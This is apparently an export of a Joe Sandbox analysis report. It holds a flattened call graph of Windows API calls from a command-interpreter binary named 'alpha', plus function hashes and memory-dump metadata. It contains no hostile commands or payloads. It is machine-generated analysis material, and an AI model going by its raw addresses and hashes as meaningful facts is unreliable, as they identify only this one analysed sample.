18230->18238 18316 7ff789bd18d4 18230->18316 18390 7ff789bcd840 GetProcessHeap HeapAlloc 18230->18390 18234 7ff789bd0167 MultiByteToWideChar 18232->18234 18235 7ff789bdd6db AcquireSRWLockShared ReadFile ReleaseSRWLockShared 18232->18235 18237 7ff789bd0131 SetFilePointer 18232->18237 18236 7ff789bc3278 166 API calls 18233->18236 18242 7ff789bd0190 18234->18242 18235->18242 18240 7ff789bdd615 18236->18240 18237->18232 18243 7ff789bc3278 166 API calls 18238->18243 18241 7ff789bcff70 2 API calls 18240->18241 18244 7ff789bdd61f longjmp 18241->18244 18242->18155 18245 7ff789bdd5e6 18243->18245 18244->18221 18246 7ff789bcff70 2 API calls 18245->18246 18247 7ff789bdd5f0 longjmp 18246->18247 18247->18233 18248->18170 18421 7ff789be8450 GetFileType 18249->18421 18252 7ff789bebf6b GetLastError 18253 7ff789bebf62 18253->18175 18255 7ff789be7f6b 18254->18255 18256 7ff789be7f59 _get_osfhandle 18254->18256 18257 7ff789be83df AcquireSRWLockShared ReadConsoleW ReleaseSRWLockShared 18255->18257 18260 7ff789be7f97 GetConsoleScreenBufferInfo 18255->18260 18256->18255 18258 7ff789be80f6 18257->18258 18259 7ff789bd8f80 7 API calls 18258->18259 18261 7ff789be8432 18259->18261 18260->18257 18262 7ff789be7fb2 18260->18262 18261->18170 18427 7ff789bf1398 18262->18427 18264 7ff789be7ff8 AcquireSRWLockShared ReadConsoleW ReleaseSRWLockShared 18281 7ff789be7fe0 18264->18281 18266 7ff789be80d1 18266->18258 18267 7ff789be80d6 GetProcessHeap RtlFreeHeap 18266->18267 18267->18258 18268 7ff789be8061 GetProcessHeap RtlFreeHeap 18268->18281 18270 7ff789be8168 _wcsnicmp 18271 7ff789be818b _wcsnicmp 18270->18271 18270->18281 18272 7ff789be81ae _wcsnicmp 18271->18272 18271->18281 18273 7ff789be81cd _wcsnicmp 18272->18273 18272->18281 18275 7ff789be81ec _wcsnicmp 18273->18275 18273->18281 18277 7ff789be820b _wcsnicmp 18275->18277 18275->18281 18279 7ff789be822a _wcsnicmp 18277->18279 18277->18281 18278 7ff789be82a1 SetConsoleCursorPosition FillConsoleOutputCharacterW WriteConsoleW 18282 7ff789bd0580 12 API calls 18278->18282 18279->18281 18281->18264 18281->18266 18281->18268 18281->18270 18283 7ff789be8364 GetProcessHeap RtlFreeHeap 18281->18283 18284 7ff789be8391 GetProcessHeap HeapAlloc 18281->18284 18432 7ff789bd58e4 EnterCriticalSection LeaveCriticalSection 18281->18432 18433 7ff789bf10d8 18281->18433 18444 7ff789bef22c _get_osfhandle GetConsoleMode 18281->18444 18282->18281 18283->18281 18284->18258 18284->18281 18286 7ff789bef4c1 GetStdHandle 18285->18286 18287 7ff789be8450 367 API calls 18286->18287 18288 7ff789bef4ea 18287->18288 18289 7ff789bef4ee wcschr 18288->18289 18290 7ff789bef509 18288->18290 18289->18286 18289->18290 18291 7ff789bd8f80 7 API calls 18290->18291 18292 7ff789bef519 18291->18292 18292->18190 18294 7ff789bd34bf 18293->18294 18315 7ff789bd34f5 18293->18315 18295 7ff789bd3578 6 API calls 18294->18295 18296 7ff789bd34c9 18295->18296 18297 7ff789bd350d AcquireSRWLockShared _get_osfhandle WriteConsoleW 18296->18297 18298 7ff789bd34cd 18296->18298 18300 7ff789bde8d2 GetLastError 18297->18300 18301 7ff789bd3557 ReleaseSRWLockShared 18297->18301 18299 7ff789bd36ec 6 API calls 18298->18299 18302 7ff789bd34e1 18299->18302 18303 7ff789bde8e5 GetLastError 18300->18303 18301->18302 18302->18303 18302->18315 18304 7ff789bd01b8 6 API calls 18303->18304 18305 7ff789bde904 18304->18305 18306 7ff789bde918 18305->18306 18307 7ff789bde908 18305->18307 18447 7ff789bef318 _get_osfhandle GetFileType 18306->18447 18308 7ff789bc3278 160 API calls 18307->18308 18308->18315 18310 7ff789bde91f 18311 7ff789bde923 18310->18311 18312 7ff789bde931 18310->18312 18313 7ff789bc3278 160 API calls 18311->18313 18314 7ff789bef1d8 160 API calls 18312->18314 18313->18315 18314->18315 18315->18148 18317 7ff789bd1935 18316->18317 18318 7ff789bd193b 18316->18318 18317->18318 18319 7ff789bd19a1 18317->18319 18320 7ff789bd195a 18318->18320 18321 7ff789bd1946 wcsrchr 18318->18321 18322 7ff789bddbda 18319->18322 18323 7ff789bd2e44 memset malloc 18319->18323 18325 7ff789bd8f80 7 API calls 18320->18325 18321->18320 18322->18320 18324 7ff789bddbdf longjmp 18322->18324 18346 7ff789bddccd 18322->18346 18345 7ff789bd19cf 18323->18345 18326 7ff789bddbf3 ??_V@YAXPEAX 18324->18326 18327 7ff789bd1978 18325->18327 18328 7ff789bddbff ??_V@YAXPEAX 18326->18328 18327->18230 18328->18320 18329 7ff789bd1a21 18332 7ff789bddc3c wcschr 18329->18332 18333 7ff789bd1a3c wcsrchr 18329->18333 18339 7ff789bd1dfe 18329->18339 18330 7ff789bd19f3 towlower wcsrchr 18330->18329 18331 7ff789bd1af6 wcsrchr 18330->18331 18336 7ff789bd1b11 towlower 18331->18336 18331->18339 18334 7ff789bddcd2 18332->18334 18335 7ff789bddc5d 18332->18335 18337 7ff789bd1a54 wcsrchr 18333->18337 18333->18339 18334->18328 18341 7ff789bc3278 166 API calls 18334->18341 18338 7ff789bccd90 166 API calls 18335->18338 18336->18339 18336->18345 18337->18334 18340 7ff789bd1a71 18337->18340 18351 7ff789bddc75 18338->18351 18339->18332 18339->18334 18344 7ff789bd1a95 18340->18344 18348 7ff789bcb900 166 API calls 18340->18348 18343 7ff789bddcef longjmp 18341->18343 18342 7ff789bd1d74 18342->18320 18352 7ff789bd1d7d ??_V@YAXPEAX 18342->18352 18347 7ff789bddd03 18343->18347 18344->18322 18344->18342 18349 7ff789bd1b64 18344->18349 18350 7ff789bd1acf 18344->18350 18345->18322 18345->18329 18345->18330 18345->18339 18346->18328 18353 7ff789bddd3b 18347->18353 18354 7ff789bddd0c SearchPathW 18347->18354 18348->18344 18349->18347 18357 7ff789bd1b76 GetFullPathNameW 18349->18357 18355 7ff789bcb900 166 API calls 18350->18355 18351->18322 18356 7ff789bd3a90 170 API calls 18351->18356 18352->18320 18363 7ff789bddd5c wcsrchr 18353->18363 18354->18353 18358 7ff789bd1ad7 ??_V@YAXPEAX 18355->18358 18359 7ff789bddc98 18356->18359 18360 7ff789bd2978 13 API calls 18357->18360 18358->18320 18361 7ff789bcff70 GetProcessHeap RtlFreeHeap 18359->18361 18362 7ff789bd1ba7 wcsrchr 18360->18362 18361->18322 18362->18363 18364 7ff789bd1bc9 18362->18364 18365 7ff789bddd73 18363->18365 18364->18342 18366 7ff789bd1bda memset 18364->18366 18367 7ff789bddd8c 18365->18367 18368 7ff789bddd78 longjmp 18365->18368 18369 7ff789bcca40 17 API calls 18366->18369 18367->18326 18367->18328 18368->18367 18370 7ff789bd1c23 18369->18370 18370->18365 18371 7ff789bddda8 GetFileAttributesExW 18370->18371 18384 7ff789bd1c4f 18370->18384 18372 7ff789bddfd0 18371->18372 18374 7ff789bdddc5 18371->18374 18372->18230 18373 7ff789bcb900 166 API calls 18375 7ff789bd1d52 18373->18375 18376 7ff789bddf34 18374->18376 18380 7ff789be85d0 8 API calls 18374->18380 18375->18342 18379 7ff789bd1d68 ??_V@YAXPEAX 18375->18379 18381 7ff789bddf4d 18376->18381 18376->18384 18377 7ff789bd1d09 18377->18373 18378 7ff789bde035 18377->18378 18379->18342 18382 7ff789bdde3f 18380->18382 18383 7ff789bf08ec 9 API calls 18381->18383 18386 7ff789bc6ee4 166 API calls 18382->18386 18383->18372 18384->18339 18384->18377 18385 7ff789bd1cd8 wcsrchr 18384->18385 18385->18378 18387 7ff789bd1cf5 18385->18387 18388 7ff789bddeb6 18386->18388 18387->18339 18387->18377 18389 7ff789bd3140 166 API calls 18388->18389 18389->18376 18391 7ff789bcd8b5 18390->18391 18392 7ff789bcdefa 18390->18392 18393 7ff789bcdf04 18391->18393 18398 7ff789bcd8e5 18391->18398 18394 7ff789bc3278 166 API calls 18392->18394 18395 7ff789bcdf15 longjmp 18393->18395 18418 7ff789bcda67 18393->18418 18394->18393 18395->18418 18396 7ff789bcff70 GetProcessHeap RtlFreeHeap 18397 7ff789bcdf34 18396->18397 18399 7ff789bcff70 GetProcessHeap RtlFreeHeap 18397->18399 18400 7ff789bcdeb6 18398->18400 18401 7ff789bcd94d GetProcessHeap HeapAlloc 18398->18401 18398->18418 18402 7ff789bcdf3c 18399->18402 18403 7ff789bc3278 166 API calls 18400->18403 18401->18400 18410 7ff789bcd97c 18401->18410 18402->18230 18404 7ff789bcdec5 18403->18404 18405 7ff789bcdeda longjmp 18404->18405 18404->18418 18405->18418 18406 7ff789bd081c 166 API calls 18406->18410 18407 7ff789bcdbce wcstol 18407->18410 18408 7ff789bcdaa9 18409 7ff789bcde4a 18408->18409 18415 7ff789bcdaf3 18408->18415 18408->18418 18411 7ff789bc3278 166 API calls 18409->18411 18409->18418 18410->18404 18410->18406 18410->18407 18410->18408 18410->18410 18413 7ff789bcdc43 18410->18413 18410->18418 18412 7ff789bcde69 longjmp 18411->18412 18412->18418 18414 7ff789bcdc52 wcstol 18413->18414 18413->18418 18414->18418 18416 7ff789bcdb80 _wcsnicmp 18415->18416 18415->18418 18416->18415 18417 7ff789bcdd0f 18416->18417 18419 7ff789bcdd30 memmove 18417->18419 18420 7ff789bcde97 memmove 18417->18420 18418->18396 18419->18418 18420->18400 18422 7ff789be8491 18421->18422 18423 7ff789be8498 18421->18423 18425 7ff789be7f00 357 API calls 18422->18425 18424 7ff789bd0010 9 API calls 18423->18424 18426 7ff789be8496 18424->18426 18425->18426 18426->18252 18426->18253 18428 7ff789bf13f3 18427->18428 18429 7ff789bf13ac 18427->18429 18428->18281 18430 7ff789bf13d8 free 18429->18430 18431 7ff789bf13bf free 18429->18431 18430->18428 18431->18430 18431->18431 18434 7ff789bccd90 166 API calls 18433->18434 18437 7ff789bf110b 18434->18437 18435 7ff789bf1360 18435->18281 18436 7ff789bf1240 memmove 18440 7ff789bf1289 18436->18440 18437->18435 18437->18436 18441 7ff789bf11d5 wcschr 18437->18441 18443 7ff789bf1138 18437->18443 18438 7ff789bcff70 GetProcessHeap RtlFreeHeap 18438->18435 18442 7ff789bf0c90 309 API calls 18440->18442 18441->18437 18442->18443 18443->18438 18445 7ff789be828a GetConsoleScreenBufferInfo 18444->18445 18446 7ff789bef259 _get_osfhandle SetConsoleMode 18444->18446 18445->18278 18446->18445 18447->18310 18449 7ff789bed381 18448->18449 18450 7ff789bed3d8 18448->18450 18451 7ff789bd34a0 166 API calls 18449->18451 18453 7ff789bed390 18451->18453 18452 7ff789bd3448 166 API calls 18452->18453 18453->18450 18453->18452 18454 7ff789bd34a0 166 API calls 18453->18454 18454->18453 18456 7ff789bd3448 166 API calls 18455->18456 18457 7ff789bed33b 18456->18457 18458 7ff789bed36c 166 API calls 18457->18458 18459 7ff789bed343 18458->18459 18460 7ff789bed3fc 166 API calls 18459->18460 18462 7ff789bed34e 18460->18462 18461 7ff789bed576 18463 7ff789bed555 18461->18463 18464 7ff789bed592 18461->18464 18462->18461 18462->18463 18462->18464 18466 7ff789bed5c4 18462->18466 18470 7ff789bed541 18462->18470 18472 7ff789bd3448 166 API calls 18462->18472 18476 7ff789bed5c2 18462->18476 18477 7ff789bed3fc 166 API calls 18462->18477 18468 7ff789bed31c 166 API calls 18463->18468 18465 7ff789bd3448 166 API calls 18464->18465 18469 7ff789bed5a5 18465->18469 18467 7ff789bd3448 166 API calls 18466->18467 18467->18476 18468->18476 18471 7ff789bed5ba 18469->18471 18474 7ff789bd3448 166 API calls 18469->18474 18470->18464 18473 7ff789bed546 18470->18473 18475 7ff789bed36c 166 API calls 18471->18475 18472->18462 18473->18463 18473->18466 18474->18471 18475->18476 18476->18097 18477->18462 18479 7ff789bc745f 18478->18479 18480 7ff789bc7468 18478->18480 18479->18480 18481 7ff789bc7497 _wcsicmp 18479->18481 18482 7ff789be48c8 _wcsicmp 18479->18482 18480->17885 18480->17890 18483 7ff789bd1ea0 8 API calls 18481->18483 18485 7ff789be48ed CreateFileW 18482->18485 18484 7ff789bc74bd 18483->18484 18484->18485 18486 7ff789bc74c9 CreateFileW 18484->18486 18485->18486 18487 7ff789be4929 18485->18487 18488 7ff789be4943 GetLastError 18486->18488 18489 7ff789bc7501 _open_osfhandle 18486->18489 18487->18489 18488->18480 18489->18480 18490 7ff789bc7520 CloseHandle 18489->18490 18490->18480 18492->17888 18495 7ff789bebf99 18494->18495 18497 7ff789bebfb5 18494->18497 18496 7ff789bd9324 malloc 18495->18496 18496->18497 18497->17923 18497->17936 18497->17949 18499 7ff789bd3421 18498->18499 18500 7ff789bd3433 18498->18500 18569 7ff789bd3684 _vsnwprintf 18499->18569 18500->17783 18571 7ff789bc58d4 RegOpenKeyExW 18502->18571 18505 7ff789bd33f0 _vsnwprintf 18506 7ff789bc58c2 18505->18506 18506->17949 18507->17949 18509 7ff789bc6f30 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 18508->18509 18529 7ff789bc6fbf 18508->18529 18510 7ff789bc6f90 18509->18510 18514 7ff789be42b6 18509->18514 18574 7ff789bd5508 GetUserDefaultLangID 18510->18574 18515 7ff789be4322 realloc 18514->18515 18516 7ff789be433f 18514->18516 18520 7ff789bc3278 153 API calls 18514->18520 18515->18514 18515->18516 18517 7ff789bd33f0 _vsnwprintf 18516->18517 18525 7ff789be437d 18517->18525 18518 7ff789bd5508 GetUserDefaultLangID 18519 7ff789bc7042 GetDateFormatW 18518->18519 18521 7ff789bc707a 18519->18521 18520->18514 18522 7ff789bd5508 GetUserDefaultLangID 18521->18522 18530 7ff789bc708a 18521->18530 18523 7ff789bc714a GetDateFormatW 18522->18523 18526 7ff789be42a0 GetLastError 18523->18526 18527 7ff789bc7175 realloc 18523->18527 18524 7ff789be427f memmove 18524->18529 18533 7ff789be43ea 18525->18533 18536 7ff789be43fb 18525->18536 18526->18514 18527->18514 18528 7ff789bc719c 18527->18528 18531 7ff789bd5508 GetUserDefaultLangID 18528->18531 18529->18518 18529->18524 18529->18529 18532 7ff789bc7020 memmove 18529->18532 18576 7ff789be8654 18529->18576 18530->18525 18539 7ff789bc70bd 18530->18539 18534 7ff789bc71ae GetDateFormatW 18531->18534 18532->18529 18535 7ff789bd3448 153 API calls 18533->18535 18534->18526 18534->18529 18538 7ff789be43f9 18535->18538 18537 7ff789bd3448 153 API calls 18536->18537 18537->18538 18539->18538 18539->18539 18540 7ff789bd8f80 7 API calls 18539->18540 18541 7ff789bc7129 18540->18541 18541->17949 18543 7ff789bd3184 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime FileTimeToSystemTime 18542->18543 18544 7ff789bde59e 18542->18544 18545 7ff789bd31e0 18543->18545 18546 7ff789bde5ed 18543->18546 18547 7ff789be8654 9 API calls 18544->18547 18550 7ff789bd31ff 18545->18550 18551 7ff789bde5a8 18545->18551 18548 7ff789bde750 18546->18548 18549 7ff789bde5fe 18546->18549 18547->18551 18556 7ff789bd33f0 _vsnwprintf 18548->18556 18553 7ff789bd5508 GetUserDefaultLangID 18549->18553 18554 7ff789bd33f0 _vsnwprintf 18550->18554 18552 7ff789bd3448 159 API calls 18551->18552 18562 7ff789bde5e8 18552->18562 18555 7ff789bde606 GetLocaleInfoW 18553->18555 18557 7ff789bd3247 18554->18557 18566 7ff789bde629 18555->18566 18563 7ff789bde748 18556->18563 18557->18557 18558 7ff789bd8f80 7 API calls 18557->18558 18560 7ff789bd3266 18558->18560 18559 7ff789bde711 18561 7ff789bd5508 GetUserDefaultLangID 18559->18561 18560->17949 18564 7ff789bde716 GetTimeFormatW 18561->18564 18562->18562 18563->18562 18565 7ff789bd34a0 159 API calls 18563->18565 18564->18563 18565->18562 18566->18559 18567 7ff789bde6e7 memmove 18566->18567 18567->18566 18570 7ff789bd36b7 18569->18570 18570->18500 18572 7ff789bc5913 RegQueryValueExW RegCloseKey 18571->18572 18573 7ff789bc588c 18571->18573 18572->18573 18573->18505 18575 7ff789bc6f97 GetLocaleInfoW 18574->18575 18575->18529 18577 7ff789be8686 18576->18577 18578 7ff789be8673 GetSystemTime 18576->18578 18579 7ff789be86cc SystemTimeToFileTime 18577->18579 18578->18579 18580 7ff789bd8f80 7 API calls 18579->18580 18581 7ff789be86ed 18580->18581 18581->18529 18585 7ff789be773c 18582->18585 18583 7ff789be777d 18583->17978 18584 7ff789bd3448 166 API calls 18584->18585 18585->18583 18585->18584 18587 7ff789be778c 166 API calls 18586->18587 18588 7ff789be76fb 18587->18588 18589 7ff789be771c 18588->18589 18590 7ff789bd3448 166 API calls 18588->18590 18589->17978 18591 7ff789be7711 18590->18591 18592 7ff789be778c 166 API calls 18591->18592 18592->18589 18594 7ff789bc6b23 18593->18594 18595 7ff789bc6a51 18593->18595 18594->18003 18595->18594 18596 7ff789be417c 18595->18596 18597 7ff789bc6ab2 18595->18597 18598 7ff789beec14 173 API calls 18596->18598 18599 7ff789bd3c24 166 API calls 18597->18599 18600 7ff789be4190 18598->18600 18601 7ff789bc6abf GetProcessHeap RtlFreeHeap 18599->18601 18622 7ff789bc6b84 SetEnvironmentStringsW GetProcessHeap RtlFreeHeap 18601->18622 18607 7ff789beca9e 18606->18607 18608 7ff789bec98e 18606->18608 18607->18008 18609 7ff789beee4c TerminateProcess GetLastError 18608->18609 18615 7ff789bec9b3 18608->18615 18609->18608 18610 7ff789bd5cb4 7 API calls 18610->18615 18611 7ff789beca21 _get_osfhandle FlushFileBuffers 18613 7ff789bcb038 _dup2 18611->18613 18612 7ff789bcd208 _close 18612->18615 18613->18615 18614 7ff789bcb038 _dup2 18614->18615 18615->18607 18615->18610 18615->18611 18615->18612 18615->18614 18617 7ff789bd3a53 FindClose 18616->18617 18621 7ff789bd3a25 18616->18621 18618 7ff789bd3a74 GetLastError 18617->18618 18619 7ff789bd3a66 18617->18619 18618->18619 18619->18009 18620 7ff789bdec38 18621->18617 18621->18620 18623 7ff789bd4a14 5 API calls 18622->18623 18624 7ff789bc6ae8 18623->18624 18625 7ff789bc6b30 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 18624->18625 18627 7ff789bcc486 18626->18627 18628 7ff789bcc4c9 18626->18628 18629 7ff789bcc48e wcschr 18627->18629 18633 7ff789bcc161 18627->18633 18631 7ff789bcff70 2 API calls 18628->18631 18628->18633 18630 7ff789bcc4ef 18629->18630 18629->18633 18632 7ff789bccd90 166 API calls 18630->18632 18631->18633 18639 7ff789bcc4f9 18632->18639 18633->17008 18633->17011 18634 7ff789bcc5bd 18635 7ff789bcc541 18634->18635 18638 7ff789bcb6b0 170 API calls 18634->18638 18635->18633 18637 7ff789bcff70 2 API calls 18635->18637 18636 7ff789bcd840 178 API calls 18636->18639 18637->18633 18638->18635 18639->18633 18639->18634 18639->18635 18639->18636 18640->17056 18642 7ff789bd3bcf 18641->18642 18644 7ff789bd3bfe 18641->18644 18643 7ff789bd3bdc wcschr 18642->18643 18642->18644 18643->18642 18643->18644 18644->17107 18646 7ff789bd8f80 7 API calls 18645->18646 18647 7ff789bd296b 18646->18647 18647->17107 18649 7ff789bd2f97 18648->18649 18650 7ff789bd2f2a 18648->18650 18649->18650 18652 7ff789bd2f9c wcschr 18649->18652 18667 7ff789bd823c FindFirstFileExW 18650->18667 18653 7ff789bd2fb6 wcschr 18652->18653 18655 7ff789bd2f5a 18652->18655 18653->18650 18653->18655 18658 7ff789bd8f80 7 API calls 18655->18658 18661 7ff789bde4ec 18655->18661 18656 7ff789bd3a0c 2 API calls 18657 7ff789bd2fe0 18656->18657 18657->18655 18659 7ff789bd2fe9 wcsrchr 18657->18659 18660 7ff789bd2f83 18658->18660 18659->18655 18660->17107 18663 7ff789bcb6b0 170 API calls 18662->18663 18664 7ff789bcaf82 18663->18664 18664->17107 18665 7ff789bcff70 2 API calls 18664->18665 18666 7ff789bdbf6e 18665->18666 18666->17107 18668 7ff789bd829d GetLastError 18667->18668 18670 7ff789bd82cd 18667->18670 18669 7ff789bd2f56 18668->18669 18669->18655 18669->18656 18671 7ff789bd8365 FindNextFileW 18670->18671 18672 7ff789bd82e5 18670->18672 18673 7ff789bd83d0 FindClose 18671->18673 18674 7ff789bd837d 18671->18674 18676 7ff789bd8332 GetProcessHeap HeapAlloc 18672->18676 18677 7ff789bd8302 18672->18677 18678 7ff789bd8310 18672->18678 18673->18672 18674->18670 18675 7ff789bd8386 18674->18675 18675->18668 18676->18678 18677->18678 18679 7ff789bd838b GetProcessHeap HeapReAlloc 18677->18679 18678->18668 18678->18669 18679->18678 18680 7ff789be50f8 GetLastError FindClose 18679->18680 18680->18669 18682 7ff789be4621 18681->18682 18683 7ff789bc72de 18681->18683 18685 7ff789be47e0 18682->18685 18686 7ff789be447b longjmp 18682->18686 18689 7ff789be475e 18682->18689 18690 7ff789be4639 18682->18690 18684 7ff789bc72eb 18683->18684 18693 7ff789be4530 18683->18693 18694 7ff789be4467 18683->18694 18742 7ff789bc7348 18684->18742 18688 7ff789bc7348 168 API calls 18685->18688 18691 7ff789be4492 18686->18691 18741 7ff789be4524 18688->18741 18701 7ff789bc7348 168 API calls 18689->18701 18695 7ff789be4695 18690->18695 18696 7ff789be463e 18690->18696 18697 7ff789bc7348 168 API calls 18691->18697 18698 7ff789bc7348 168 API calls 18693->18698 18694->18684 18694->18691 18700 7ff789be4475 18694->18700 18706 7ff789bc73d4 168 API calls 18695->18706 18696->18686 18714 7ff789be4654 18696->18714 18702 7ff789be44a8 18697->18702 18725 7ff789be4549 18698->18725 18699 7ff789bc7315 18757 7ff789bc73d4 18699->18757 18700->18686 18700->18695 18701->18685 18715 7ff789be44e2 18702->18715 18719 7ff789bc7348 168 API calls 18702->18719 18703 7ff789bc7348 168 API calls 18703->18699 18704 7ff789bc72b0 168 API calls 18708 7ff789be480e 18704->18708 18727 7ff789be469a 18706->18727 18707 7ff789be45b2 18709 7ff789bc7348 168 API calls 18707->18709 18708->17149 18713 7ff789be45c7 18709->18713 18710 7ff789be455e 18710->18707 18717 7ff789bc7348 168 API calls 18710->18717 18711 7ff789be46e1 18712 7ff789bc72b0 168 API calls 18711->18712 18721 7ff789be4738 18712->18721 18718 7ff789bc7348 168 API calls 18713->18718 18716 7ff789bc7348 168 API calls 18714->18716 18720 7ff789bc72b0 168 API calls 18715->18720 18722 7ff789bc7323 18716->18722 18717->18707 18724 7ff789be45db 18718->18724 18719->18715 18726 7ff789be44f1 18720->18726 18723 7ff789bc7348 168 API calls 18721->18723 18722->17149 18723->18741 18728 7ff789bc7348 168 API calls 18724->18728 18725->18707 18725->18710 18730 7ff789bc7348 168 API calls 18725->18730 18729 7ff789bc72b0 168 API calls 18726->18729 18727->18711 18731 7ff789be46c7 18727->18731 18732 7ff789be46ea 18727->18732 18733 7ff789be45ec 18728->18733 18734 7ff789be4503 18729->18734 18730->18710 18731->18711 18738 7ff789bc7348 168 API calls 18731->18738 18735 7ff789bc7348 168 API calls 18732->18735 18736 7ff789bc7348 168 API calls 18733->18736 18734->18722 18737 7ff789bc7348 168 API calls 18734->18737 18735->18711 18739 7ff789be4600 18736->18739 18737->18741 18738->18711 18740 7ff789bc7348 168 API calls 18739->18740 18740->18741 18741->18704 18741->18722 18743 7ff789bc735d 18742->18743 18744 7ff789bc3278 166 API calls 18743->18744 18746 7ff789be4838 18743->18746 18756 7ff789bc73ab 18743->18756 18745 7ff789be4820 longjmp 18744->18745 18745->18746 18747 7ff789bc3278 166 API calls 18746->18747 18748 7ff789be4844 longjmp 18747->18748 18749 7ff789be485a 18748->18749 18750 7ff789bc7348 166 API calls 18749->18750 18751 7ff789be487b 18750->18751 18752 7ff789bc7348 166 API calls 18751->18752 18753 7ff789be48ad 18752->18753 18754 7ff789bc7348 166 API calls 18753->18754 18755 7ff789bc72ff 18754->18755 18755->18699 18755->18703 18758 7ff789bc7401 18757->18758 18759 7ff789be485a 18757->18759 18758->18722 18760 7ff789bc7348 168 API calls 18759->18760 18761 7ff789be487b 18760->18761 18762 7ff789bc7348 168 API calls 18761->18762 18763 7ff789be48ad 18762->18763 18764 7ff789bc7348 168 API calls 18763->18764 18765 7ff789be48be 18764->18765 18765->18722 16742 7ff789bd8d80 16743 7ff789bd8da4 16742->16743 16744 7ff789bd8db6 16743->16744 16745 7ff789bd8dbf Sleep 16743->16745 16746 7ff789bd8ddb _amsg_exit 16744->16746 16748 7ff789bd8de7 16744->16748 16745->16743 16746->16748 16747 7ff789bd8e56 _initterm 16752 7ff789bd8e73 _IsNonwritableInCurrentImage 16747->16752 16748->16747 16749 7ff789bd8e3c 16748->16749 16748->16752 16756 7ff789bd37d8 GetCurrentThreadId OpenThread 16752->16756 16789 7ff789bd04f4 16756->16789 16758 7ff789bd3839 HeapSetInformation RegOpenKeyExW 16759 7ff789bd388d 16758->16759 16760 7ff789bde9f8 RegQueryValueExW RegCloseKey 16758->16760 16761 7ff789bd5920 VirtualQuery VirtualQuery 16759->16761 16763 7ff789bdea41 GetThreadLocale 16760->16763 16762 7ff789bd38ab GetConsoleOutputCP GetCPInfo 16761->16762 16762->16763 16764 7ff789bd38f1 memset 16762->16764 16771 7ff789bd3919 16763->16771 16764->16771 16765 7ff789bd4d5c 391 API calls 16765->16771 16766 7ff789bdeb27 _setjmp 16766->16771 16767 7ff789bd3948 _setjmp 16767->16771 16768 7ff789be8530 370 API calls 16768->16771 16769 7ff789bc3240 166 API calls 16769->16771 16770 7ff789bd01b8 6 API calls 16770->16771 16771->16760 16771->16765 16771->16766 16771->16767 16771->16768 16771->16769 16771->16770 16772 7ff789bd4c1c 166 API calls 16771->16772 16773 7ff789bdeb71 _setmode 16771->16773 16774 7ff789bd86f0 182 API calls 16771->16774 16775 7ff789bd0580 12 API calls 16771->16775 16778 7ff789bd58e4 EnterCriticalSection LeaveCriticalSection 16771->16778 16779 7ff789bcbe00 647 API calls 16771->16779 16780 7ff789bcdf60 481 API calls 16771->16780 16781 7ff789bd58e4 EnterCriticalSection LeaveCriticalSection 16771->16781 16772->16771 16773->16771 16774->16771 16776 7ff789bd398b GetConsoleOutputCP GetCPInfo 16775->16776 16777 7ff789bd04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16776->16777 16777->16771 16778->16771 16779->16771 16780->16771 16782 7ff789bdebbe GetConsoleOutputCP GetCPInfo 16781->16782 16783 7ff789bd04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16782->16783 16784 7ff789bdebe6 16783->16784 16785 7ff789bcbe00 647 API calls 16784->16785 16786 7ff789bd0580 12 API calls 16784->16786 16785->16784 16787 7ff789bdebfc GetConsoleOutputCP GetCPInfo 16786->16787 16788 7ff789bd04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16787->16788 16788->16771 16791 7ff789bd0504 16789->16791 16790 7ff789bd051e GetModuleHandleW 16790->16791 16791->16790 16792 7ff789bd054d GetProcAddress 16791->16792 16793 7ff789bd056c SetThreadLocale 16791->16793 16792->16791

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FF789BD0A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                                                                                                    • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                                                                                                    • API String ID: 3305344409-4288247545
                                                                                                                    • Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                                                                                                    • Instruction ID: d48eca7e991860eda796c8a2fffa1c179bb5fca4273eef60afd397f036cc33b0
                                                                                                                    • Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                                                                                                    • Instruction Fuzzy Hash: AD42C521B0C68A85FA54BF6198182B9ABB1FF85F96FA44134D95E47BD4DF3CE044C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCAA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
